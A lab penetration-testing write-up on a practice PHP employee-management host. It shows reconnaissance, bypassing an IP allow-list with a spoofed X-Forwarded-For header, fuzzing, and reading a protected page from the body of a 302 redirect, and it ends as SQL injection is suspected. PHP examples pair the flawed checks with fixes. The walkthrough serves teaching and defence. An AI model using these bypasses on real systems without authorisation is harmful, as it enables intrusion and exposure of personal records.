Web
Nmap discovered a web server running on port 80 of the 192.168.107.200 host. The running service is PHP cli server 5.5 or later (PHP 7.3.33).
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE]
└─$ curl -I -X OPTIONS http://$IP/
HTTP/1.1 302 Found
Host: 192.168.107.200
Date: Sun, 29 Jun 2025 12:15:24 GMT
Connection: close
X-Powered-By: PHP/7.3.33
Set-Cookie: PHPSESSID=m263rr0apovsill581q6vigu47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php
Content-type: text/html; charset=UTF-8
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE]
└─$ curl -I http://$IP/
HTTP/1.1 302 Found
Host: 192.168.107.200
Date: Sun, 29 Jun 2025 12:15:27 GMT
Connection: close
X-Powered-By: PHP/7.3.33
Set-Cookie: PHPSESSID=uqae4udvnr9eg1b91hbfs1lc58; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php
Content-type: text/html; charset=UTF-8
Webroot
Requests to the webroot are redirected to the /login.php endpoint. There appears to be an IP filter that only accepts requests from the 10.10.10.x range.
X-Forwarded-For
Creating a session handling rule to automatically append the X-Forwarded-For header with a value of 10.10.10.10.
It's a login page to a custom PHP application.
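The filter above is defeated by a single request header because the application reads the client address from X-Forwarded-For, a header any client can set. The following PHP is an added illustration (not the target application's code): the weak check keyed on the header, beside a check keyed on the TCP peer address that only honours X-Forwarded-For when the peer is a proxy we operate. The 10.10.10.0/24 range is the one observed above; the proxy address 10.10.10.1 and the client address 192.168.45.5 are constructed.

```php
<?php
// Added example, not the application's own code.
// Allowed range taken from the writeup; proxy address below is an assumption.
const ALLOWED_CIDR   = '10.10.10.0/24';
const TRUSTED_PROXIES = ['10.10.10.1']; // assumed reverse-proxy address

// True if the IPv4 address $ip falls inside $cidr (e.g. "10.10.10.0/24").
function ip_in_cidr(string $ip, string $cidr): bool
{
    [$net, $bits] = explode('/', $cidr, 2);
    $ipLong  = ip2long($ip);
    $netLong = ip2long($net);
    if ($ipLong === false || $netLong === false) {
        return false;
    }
    $bits = (int)$bits;
    $mask = $bits === 0 ? 0 : ((~0 << (32 - $bits)) & 0xFFFFFFFF);
    return ($ipLong & $mask) === ($netLong & $mask);
}

// WEAK: the client fully controls X-Forwarded-For, so anyone can pass the
// check by sending "X-Forwarded-For: 10.10.10.10", which is what happens above.
function client_allowed_weak(array $server): bool
{
    $ip = $server['HTTP_X_FORWARDED_FOR'] ?? $server['REMOTE_ADDR'] ?? '';
    return ip_in_cidr($ip, ALLOWED_CIDR);
}

// FIXED: decide on the socket peer (REMOTE_ADDR). Only when that peer is a
// proxy we run may X-Forwarded-For be consulted, and then only its rightmost
// entry, which is the one our proxy appended; anything further left is
// client-supplied and must not be trusted.
function client_allowed_fixed(array $server): bool
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    $ip   = $peer;
    if (in_array($peer, TRUSTED_PROXIES, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $ip = end($chain);
    }
    return ip_in_cidr($ip, ALLOWED_CIDR);
}

// Constructed request: a client outside the range spoofing the header directly.
$spoofed = [
    'REMOTE_ADDR'          => '192.168.45.5',
    'HTTP_X_FORWARDED_FOR' => '10.10.10.10',
];
var_dump(client_allowed_weak($spoofed));  // bool(true): filter bypassed
var_dump(client_allowed_fixed($spoofed)); // bool(false): request rejected

// Constructed request arriving through the trusted proxy on behalf of 10.10.10.25.
$viaProxy = [
    'REMOTE_ADDR'          => '10.10.10.1',
    'HTTP_X_FORWARDED_FOR' => '203.0.113.7, 10.10.10.25',
];
var_dump(client_allowed_fixed($viaProxy)); // bool(true): rightmost entry is in range
```

Run it with `php example.php`. The design point is that REMOTE_ADDR comes from the TCP connection and cannot be set by the client, whereas every X-Forwarded-For value except the one appended by your own proxy is attacker input; if there is no proxy in front of the application, the header should simply be ignored.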
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/robust]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -H 'X-Forwarded-For: 10.10.10.10' -u http://$IP/FUZZ -ic -e .html,.txt,.php -fw 1
________________________________________________
:: Method : GET
:: URL : http://192.168.107.200/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Header : X-Forwarded-For: 10.10.10.10
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 1
________________________________________________
Home.php [Status: 302, Size: 3030, Words: 143, Lines: 59, Duration: 50ms]
Login.php [Status: 200, Size: 1770, Words: 243, Lines: 103, Duration: 23ms]
favicon.ico [Status: 200, Size: 5430, Words: 9, Lines: 21, Duration: 22ms]
home.php [Status: 302, Size: 3030, Words: 143, Lines: 59, Duration: 36ms]
login.php [Status: 200, Size: 1770, Words: 243, Lines: 103, Duration: 25ms]
:: Progress: [81912/81912] :: Job [1/1] :: 289 req/sec :: Duration: [0:02:41] :: Errors: 0 ::
ffuf identified another endpoint: home.php. The interesting observation here is that the discovered endpoint responds with a 302 Found status code, yet the response body has a length of 3030 bytes. This unusually large response size for a redirect suggests that the server returns meaningful content alongside the redirect. Such behaviour typically points to improperly enforced access controls or misconfigured redirection logic, potentially exposing sensitive information to unauthenticated users.
/home.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/robust]
└─$ curl -i -H 'X-Forwarded-For: 10.10.10.10' http://$IP/home.php
HTTP/1.1 302 Found
Host: 192.168.107.200
Date: Sun, 29 Jun 2025 13:02:28 GMT
Connection: close
X-Powered-By: PHP/7.3.33
Set-Cookie: PHPSESSID=tng4jut4qnl8o7gl78tnu881ov; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php
Content-type: text/html; charset=UTF-8
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css"
integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
<script src="https://kit.fontawesome.com/214f4b7d30.js" crossorigin="anonymous"></script>
<title>Manage Employees</title>
</head>
<body>
<div class="container">
<h1>Manage Employees</h1>
<hr/>
<form method="get">
<input type="hidden" name="action" value="search"/>
<label>
First name:
<input type="text" name="first_name" value="">
</label>
<label>
Last name:
<input type="text" name="last_name" value="">
</label>
<input type="submit" value="Submit">
</form>
<table class="table table-striped">
<thead>
<tr>
<th scope="col">Id</th>
<th scope="col">First name</th>
<th scope="col">Last name</th>
<th scope="col">Birth date</th>
<th scope="col">Actions</th>
</tr>
</thead>
<tbody>
<tr><th scope="row">1</th><td>Desireef</td><td>Joubert</td><td>2007-04-01</td><td><a href="?action=update&id=1"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=1"><i class="fas fa-trash"></i></a></td></tr><tr><th scope="row">2</th><td>Blythe</td><td>Weatherall</td><td>2007-05-10</td><td><a href="?action=update&id=2"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=2"><i class="fas fa-trash"></i></a></td></tr><tr><th scope="row">3</th><td>Felisha</td><td>Bookman</td><td>2006-03-12</td><td><a href="?action=update&id=3"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=3"><i class="fas fa-trash"></i></a></td></tr><tr><th scope="row">4</th><td>Natacha</td><td>Pua</td><td>2007-11-24</td><td><a href="?action=update&id=4"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=4"><i class="fas fa-trash"></i></a></td></tr><tr><th scope="row">5</th><td>Chante</td><td>Fenske</td><td>2007-12-28</td><td><a href="?action=update&id=5"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=5"><i class="fas fa-trash"></i></a></td></tr> </tbody>
</table>
<p>Number of Employees: 10</p>
<a href="?page=1">1</a> <a href="?page=2">2</a>
</div>
<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js"
integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n"
crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js"
integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo"
crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js"
integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6"
crossorigin="anonymous"></script>
</body>
</html>
Despite returning a 302 Found status code with a Location: login.php header, the /home.php endpoint still serves the full HTML content of the page, revealing sensitive application data.
This indicates that access control relies solely on the client following the redirect and is not enforced server-side: the server emits the redirect header but still sends the protected page body. As a result, the restriction can be trivially bypassed using tools like curl, exposing sensitive functionality without authentication.
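The 302-with-body pattern flagged in the ffuf results and confirmed by curl above is the classic PHP mistake of calling header('Location: ...') without stopping the script. The PHP below is an added illustration (not the target application's code) of the broken guard beside the fixed one; the session key 'user' and the employee rows are constructed.

```php
<?php
// Added example, not the application's own code. Session key and data are assumed.
session_start();

function is_logged_in(): bool
{
    return isset($_SESSION['user']);
}

// VULNERABLE: header() only queues "Location: login.php" (and an implied 302)
// in the response; PHP keeps executing, so the protected HTML below is still
// rendered and sent to the unauthenticated client, exactly what curl -i shows.
function require_login_broken(): void
{
    if (!is_logged_in()) {
        header('Location: login.php');
        // missing exit: execution falls through into the page body
    }
}

// FIXED: stop the script immediately after issuing the redirect so that an
// unauthenticated client receives the redirect and nothing else.
function require_login_fixed(): void
{
    if (!is_logged_in()) {
        header('Location: login.php', true, 302);
        exit;
    }
}

require_login_fixed(); // swap for require_login_broken() to reproduce the leak

// Protected content: only reachable when the guard above did not exit.
$employees = [ // constructed sample rows
    ['id' => 1, 'first' => 'Desireef', 'last' => 'Joubert',    'dob' => '2007-04-01'],
    ['id' => 2, 'first' => 'Blythe',   'last' => 'Weatherall', 'dob' => '2007-05-10'],
];
echo "<h1>Manage Employees</h1>\n<table>\n";
foreach ($employees as $e) {
    printf(
        "<tr><td>%d</td><td>%s</td><td>%s</td><td>%s</td></tr>\n",
        $e['id'],
        htmlspecialchars($e['first'], ENT_QUOTES),
        htmlspecialchars($e['last'], ENT_QUOTES),
        htmlspecialchars($e['dob'], ENT_QUOTES)
    );
}
echo "</table>\n";
```

A quick way to audit a whole application for this defect from the outside is to request each endpoint without following redirects and print the status code next to the downloaded size, for example `curl -s -o /dev/null -w '%{http_code} %{size_download}\n' http://$IP/home.php`; any 3xx response with more than a few hundred bytes of body deserves a manual look.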
Authentication Bypass
Removing the Location header
As expected, removing the Location header reveals the content of the /home.php endpoint.
Creating a Burp Suite match/replace rule to automatically remove the Location header.
SQLi
It would appear that the search function is vulnerable to SQL injection.